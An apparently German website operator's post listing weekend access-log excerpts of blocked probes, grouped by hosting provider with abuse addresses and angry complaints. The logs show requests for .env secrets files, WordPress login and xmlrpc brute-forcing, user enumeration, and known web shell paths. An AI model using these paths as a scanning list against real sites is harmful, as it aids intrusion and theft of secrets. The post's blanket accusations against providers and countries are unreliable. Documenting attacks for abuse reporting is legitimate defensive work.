NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
137.59.106.65 website.*.de – – [12/Oct/2025:08:48:07 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
137.59.106.65 website.*.de – – [12/Oct/2025:08:52:32 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
137.59.106.65 website.*.de – – [12/Oct/2025:09:01:46 +0200] „HEAD /Wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
137.59.106.65 website.*.de – – [12/Oct/2025:09:01:46 +0200] „HEAD /Wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
137.59.106.65 website.*.de – – [12/Oct/2025:09:08:15 +0200] „HEAD /WORDPRESS HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
137.59.106.65 website.*.de – – [12/Oct/2025:09:15:57 +0200] „HEAD /WordPress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
137.59.106.65 website.*.de – – [12/Oct/2025:09:20:46 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
137.59.106.65 website.*.de – – [12/Oct/2025:09:28:37 +0200] „HEAD /Wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
… and so on…. and so on…!!! VERY UNSECURE PROVIDER!!!

AS51167 – Contabo GmbH – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2a02:c207:2013:6262::1 website.*.de – – [12/Oct/2025:12:24:41 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-requests/2.18.1“
2a02:c207:2013:6262::1 website.*.de – – [12/Oct/2025:12:24:45 +0200] „POST / HTTP/1.0“ 403 – „-“ „url“
2a02:c207:2013:6262::1 website.*.de – – [12/Oct/2025:12:24:48 +0200] „POST /core/.env HTTP/1.0“ 403 – „-“ „url“
2a02:c207:2013:6262::1 website.*.de – – [12/Oct/2025:12:24:51 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „python-requests/2.18.1“
2a02:c207:2013:6262::1 website.*.de – – [12/Oct/2025:12:24:53 +0200] „POST / HTTP/1.0“ 403 – „-“ „url“
2a02:c207:2013:6262::1 website.*.de – – [12/Oct/2025:12:24:55 +0200] „POST /core/.env HTTP/1.0“ 403 – „-“ „url“

ABUSE-MAIL NR. 17 – WEEKEND!

abuse@worldhost.group,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@spectraip.nl,abuse@ionos.com

AS51713 – WHG Hosting Services Ltd – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
192.250.224.148 www.website.*.com – – [11/Oct/2025:23:58:40 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36“
192.250.224.148 www.website.*.com – – [11/Oct/2025:23:58:43 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36“

AS16276 – OVH SAS – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
OVH THIS WEEKEND AGAIN AND AGAIN! – THIS ARE VERY UNSECURE NETWORKS!!!
ONE AUTOMATIC ANSWER – ABUSE PER EMAIL IS STANDARD!
54.38.25.221 www.website.*.com – – [12/Oct/2025:00:16:59 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)“
54.38.25.221 www.website.*.com – – [12/Oct/2025:00:16:59 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)“

AS62068 – SpectraIP B.V. – NOW ALSO VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
MAIL IS OUT, WE´RE WAITING FOR ANSWER!!!
185.244.36.159 www.website.*.com – – [12/Oct/2025:01:29:32 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASJB; ASJB; MAAU; rv:11.0) like Gecko“
185.244.36.159 www.website.*.com – – [12/Oct/2025:01:29:32 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASJB; ASJB; MAAU; rv:11.0) like Gecko“

AS8560 – IONOS SE – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
194.164.126.55 www.website.*.com – – [12/Oct/2025:01:47:36 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15“
194.164.126.55 www.website.*.com – – [12/Oct/2025:01:47:39 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15“

ABUSE-MAIL NR. 18 – WEEKEND!

noc@yarnet.ru,noyobzoda.far@outlook.com, abuse@slt.lk

AS197078 – Yarnet Ltd – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ALSO RUSSIA IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
MAIL IS OUT, WE´RE WAITING FOR ANSWER!!!
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:20 +0200] „GET /mar.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:20 +0200] „GET /MARIJUANA.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:20 +0200] „GET /marijuana.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:20 +0200] „GET /wp-atom.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:20 +0200] „GET /ninja.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:21 +0200] „GET /nf_tracking.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:21 +0200] „GET /ninjawebshell.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:21 +0200] „GET /atomlib.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
188.68.178.22 website.*.com – – [12/Oct/2025:12:42:21 +0200] „GET /shell.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS208885 – Noyobzoda Faridduni Saidilhom – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ABUSE-MAIL 3 FROM TODAY!!! – HACKER-IDIOTS AGAIN AND AGAIN THIS WEEKEND!!! – VERY UNSECURE PROVIDER!!!
WE BLOCK ALSO ISP WITH HACKER-IDIOTS COMPLETE!
MAIL IS OUT, WE´RE WAITING FOR ANSWER!!!
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „GET /wp-json/wp/v2/users HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „GET /?author=1 HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „GET /wp-json/wp/v2/users HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „GET /?author=1 HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.13 (Java/11.0.28)“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:25 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.13 (Java/11.0.28)“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:26 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:26 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“

AS9329 – Sri Lanka Telecom Internet – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:03 +0200] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:03 +0200] „GET /wp-content/plugins/WordPressCore-1/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:04 +0200] „GET /wp-content/themes/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:05 +0200] „GET /wp-content/plugins/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:05 +0200] „GET /wp-includes/images/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:06 +0200] „GET /wp-includes/widgets/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:06 +0200] „GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:07 +0200] „GET /wp-content/plugins/HelloDollyV2-1/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:07 +0200] „GET /wp-content/themes/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:08 +0200] „GET /wp-content/plugins/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:09 +0200] „GET /wp-includes/images/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:09 +0200] „GET /wp-includes/widgets/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website.*.com – – [12/Oct/2025:14:09:10 +0200] „GET /wp-content/plugins/HelloDollyV2_ncvt/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“

ABUSE-MAIL NR. 19 – WEEKEND!

dagline.net@mail.ru, noyobzoda.far@outlook.com

AS203695 – Saypudinov Ayatula – VERY UNWANTED PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
MAIL IS OUT, WE´RE WAITING FOR ANSWER!!!
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:21 +0200] „GET /ninja.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:21 +0200] „GET /MARIJUANA.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:21 +0200] „GET /wp-atom.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:21 +0200] „GET /mar.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:21 +0200] „GET /nf_tracking.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:21 +0200] „GET /atomlib.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:21 +0200] „GET /marijuana.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:22 +0200] „GET /ninjawebshell.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
46.8.242.73 website.*.com – – [12/Oct/2025:10:03:22 +0200] „GET /shell.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“

AS208885 – Noyobzoda Faridduni Saidilhom – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ABUSE-MAIL 2 FROM TODAY!!!
WE BLOCK ALSO ISP WITH HACKER-IDIOTS COMPLETE!
MAIL IS OUT, WE´RE WAITING FOR ANSWER!!!
86.54.24.140 website.*.com – – [12/Oct/2025:12:11:56 +0200] „GET /wp-json/wp/v2/users HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:11:57 +0200] „GET /?author=1 HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:11:57 +0200] „GET /wp-json/wp/v2/users HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:11:57 +0200] „GET /?author=1 HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:11:58 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.13 (Java/11.0.28)“
86.54.24.140 website.*.com – – [12/Oct/2025:12:11:58 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:11:58 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:11:59 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.13 (Java/11.0.28)“
86.54.24.140 website.*.com – – [12/Oct/2025:12:12:00 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:12:00 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 20 – WEEKEND!

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com

AS8075 – Microsoft Corporation – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONE AUTOMATIC ANSWER WITH BULLSHIT!
ALSO cert@microsoft.com NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:26 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:26 +0200] „GET /zxl.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:28 +0200] „GET /gdn.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:29 +0200] „GET /new4.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:29 +0200] „GET /des.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:30 +0200] „GET /jga.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:31 +0200] „GET /abcd.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:31 +0200] „GET /nc4.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:32 +0200] „GET /we.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:32 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:33 +0200] „GET /class.php HTTP/1.0“ 403 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:33 +0200] „GET /ar.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:34 +0200] „GET /file.php? HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:34 +0200] „GET /cache.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:35 +0200] „GET /buy.php HTTP/1.0“ 403 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:35 +0200] „GET /lv.php HTTP/1.0“ 302 – „-“ „-“
48.218.34.58 website.*.com – – [12/Oct/2025:15:21:36 +0200] „GET /cong.php HTTP/1.0“ 302 – „-“ „-“
… and so on… and so on…!!! VERY UNSECURE PROVIDER!!!

AS8075 – Microsoft Corporation – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONE AUTOMATIC ANSWER WITH BULLSHIT!
ALSO cert@microsoft.com NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:25 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:26 +0200] „GET /zxl.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:28 +0200] „GET /gdn.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:28 +0200] „GET /new4.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:29 +0200] „GET /des.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:29 +0200] „GET /jga.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:30 +0200] „GET /abcd.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:31 +0200] „GET /nc4.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:31 +0200] „GET /we.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:32 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:32 +0200] „GET /class.php HTTP/1.0“ 403 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:33 +0200] „GET /ar.php HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:33 +0200] „GET /file.php? HTTP/1.0“ 302 – „-“ „-“
172.207.225.239 website.*.com – – [12/Oct/2025:13:58:34 +0200] „GET /cache.php HTTP/1.0“ 302 – „-“ „-“
.. and so on… and so on…!!! VERY UNSECURE PROVIDER!!!

Leider reagieren zu viele Provider absolut nicht, mit dieser UNTÄTIGKEIT mutieren solche Provider immer mehr zum SUPPORTER FÜR DIESE DUMMEN HACKER-IDIOTEN!

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

DIE PROTOKOLL-AUSZÜGE – ABUSE-MELDUNGEN vom WOCHENENDE AB 03. OKTOBER 25!

Wie immer auch dieses Wochenende mal wieder unzählige dumme Hacking-Versuche, beginnend ab dem Freitaf-Nachmittag, 03. Oktober 25.

Hier ein paar Auszüge dazu, dessen Abuse-Mails MIT ENTSPRECHENDER BEMERKUNG an die MIT VERANTWORTLICHEN PROVIDER heute am Montag-Vormittag nun rausgehen:

ABUSE-MAIL NR. 1 – WEEKEND!

abuse@datacamp.co.uk,abuse@cloudinnovation.org,tech@cloudinnovation.org,report@abuseradar.com

Cloud Innovation – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
156.233.95.31 website*x.com – – [03/Oct/2025:18:44:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/114.0 Safari/537.36“

AS45102 – Alibaba (US) Technology Co., Ltd.- AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
47.79.196.235 website*x.com – – [03/Oct/2025:20:21:21 +0200] „GET /css/images/elements/autocad.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.198.55 website*x.com – – [03/Oct/2025:20:21:22 +0200] „GET /css/images/elements/autocad.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.196.118 website*x.com – – [03/Oct/2025:20:21:22 +0200] „GET /css/images/elements/autocad.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“

AS206092 – Internet Utilities Europe and Asia Limited – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
104.234.19.96 website*x.com – – [04/Oct/2025:03:14:07 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“

